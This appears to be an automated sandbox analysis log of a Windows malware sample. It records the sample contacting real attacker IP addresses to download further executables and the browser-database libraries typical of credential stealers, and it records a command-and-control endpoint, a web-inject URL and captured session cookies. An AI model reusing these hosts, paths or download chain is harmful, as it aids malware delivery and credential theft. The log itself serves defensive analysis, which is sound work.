Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket, 0_2_0042676C
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 Apr 2024 23:11:23 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec
Source: global traffic HTTP traffic detected: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMTUser-Agent: Microsoft BITS/7.8Host: download.iolo.net
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGPm2u7EGIjCw4PtzX5gzzDlwzXIWtDXrCiRfdbHDSucDXyTngU0wLJluDFuO6KRqHMbqhlFxbvMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=Ram1jU97G6ZBnKUUJ8oMI4-XjULBzDD790zVj43iBZNk1Yp2YaPNHXrGAvGLRspoPDvdJcvektgjxpEjjxVGkUCXSctFEbyvv0N67MwU4FeBdKvf4ddYZiZKgFUux1935pXwz6RcpiBPOemLrBLXECHbF945fOhdYcRCbOGHnuw
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGPm2u7EGIjA9dOSf1SDRwKrHbolvoP0rB9qzZ3OV654e3Nqcz9gZgYsWMechJLShD5a3n0HBadgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=U1mNAjRYwf8kotXLaHRXjIKbCBpEhQgUsQnSx5kNtaoiWyyfmjbtTM2oYBZgyEvsoJPYIXbLzSJiFX-UcmWyliVD-zR1RlK95xi5BrjDst_SB4sfe96osAXmTUm1HiywIJFIsfh-7xRoEKc9pv9KCzM5YzglK92qpic1G_e4DOM
Source: global traffic HTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic DNS traffic detected: DNS query: download.iolo.net
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714346800049&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dllx
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dllB
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dllj
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2528909810.0000000000549000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php/
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php2
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000549000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php2496b2f8604de64a7a02afb624c0-release
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php3
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php=
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpD%D
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpF
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpQrR
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpW%Microsoft
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpY
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpZ
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpb
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpe
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpl.
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpl.ID
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpmD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpn
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpqD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpr
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpu
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpv
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpy
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php~
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.150/ons
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4FP
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:9000t-
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
